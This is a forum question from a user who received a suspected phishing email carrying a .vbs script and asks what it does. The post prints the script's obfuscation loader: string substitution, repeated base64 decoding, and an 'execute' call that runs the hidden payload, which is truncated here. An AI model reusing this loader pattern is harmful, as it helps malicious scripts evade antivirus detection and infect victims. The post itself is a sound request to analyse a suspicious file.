I received an email which I believe may have been a targeted phishing attack. There was a link to a .zip
with a .vbs
.
I'm not knowledgeable about vbs but it would appear it starts with a string, does manipulations to it, and then executes an external command (probably to avoid detection).
The first 2 lines are too long to put into this question, but here is a snipit
qhka = "T24~015~ZXJ~006~b3I~015~cmV~020~~013~W1~019~IG5~019~~003~HQNC~018~R~010~bSB~009~b3N0KDE~010..."
q = Array(0,0,0,0,0,0,0,0,0,...1,...0)
then further down
cryptedLength = 2366
Dim crypted
for index = 1 to cryptedLength
if (q(index) = 2) then crypted = crypted&"Q"
at the end
next
execute(crypted)
any explanation as to what this does? Virustotal didn't detect anything. Is this a virus? Is the code written this way to avoid detection?
EDIT: the value of crypted
is
Function Base64Decode(ByVal vCode)
Dim oXML, oNode
Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
Set oNode = oXML.CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.text = vCode
Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue)
Set oNode = Nothing
Set oXML = Nothing
End Function
Function Stream_BinaryToString(Binary)
Const adTypeText = 2
Const adTypeBinary = 1
Dim BinaryStream
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.Write Binary
BinaryStream.Position = 0
BinaryStream.Type = adTypeText
BinaryStream.CharSet = "us-ascii"
Stream_BinaryToString = BinaryStream.ReadText
Set BinaryStream = Nothing
End Function
Function Base64Encode(sText)
Dim oXML, oNode
Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
Set oNode = oXML.CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.nodeTypedValue =Stream_StringToBinary(sText)
Base64Encode = oNode.text
Set oNode = Nothing
Set oXML = Nothing
End Function
Function Stream_StringToBinary(Text)
Const adTypeText = 2
Const adTypeBinary = 1
Dim BinaryStream
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeText
BinaryStream.CharSet = "us-ascii"
BinaryStream.Open
BinaryStream.WriteText Text
BinaryStream.Position = 0
BinaryStream.Type = adTypeBinary
BinaryStream.Position = 0
Stream_StringToBinary = BinaryStream.Read
Set BinaryStream = Nothing
End Function
qhka = Replace(qhka, "~001~","q")
qhka = Replace(qhka, "~002~","w")
qhka = Replace(qhka, "~003~","e")
qhka = Replace(qhka, "~004~","r")
qhka = Replace(qhka, "~005~","t")
qhka = Replace(qhka, "~006~","y")
qhka = Replace(qhka, "~007~","u")
qhka = Replace(qhka, "~008~","i")
qhka = Replace(qhka, "~009~","o")
qhka = Replace(qhka, "~010~","p")
qhka = Replace(qhka, "~011~","a")
qhka = Replace(qhka, "~012~","s")
qhka = Replace(qhka, "~013~","d")
qhka = Replace(qhka, "~014~","f")
qhka = Replace(qhka, "~015~","g")
qhka = Replace(qhka, "~016~","h")
qhka = Replace(qhka, "~017~","j")
qhka = Replace(qhka, "~018~","k")
qhka = Replace(qhka, "~019~","l")
qhka = Replace(qhka, "~020~","z")
qhka = Replace(qhka, "~021~",Chr(10))
qhka = Replace(qhka, "~022~",Chr(13))
execute Base64Decode(Base64Encode(Base64Decode(qhka)))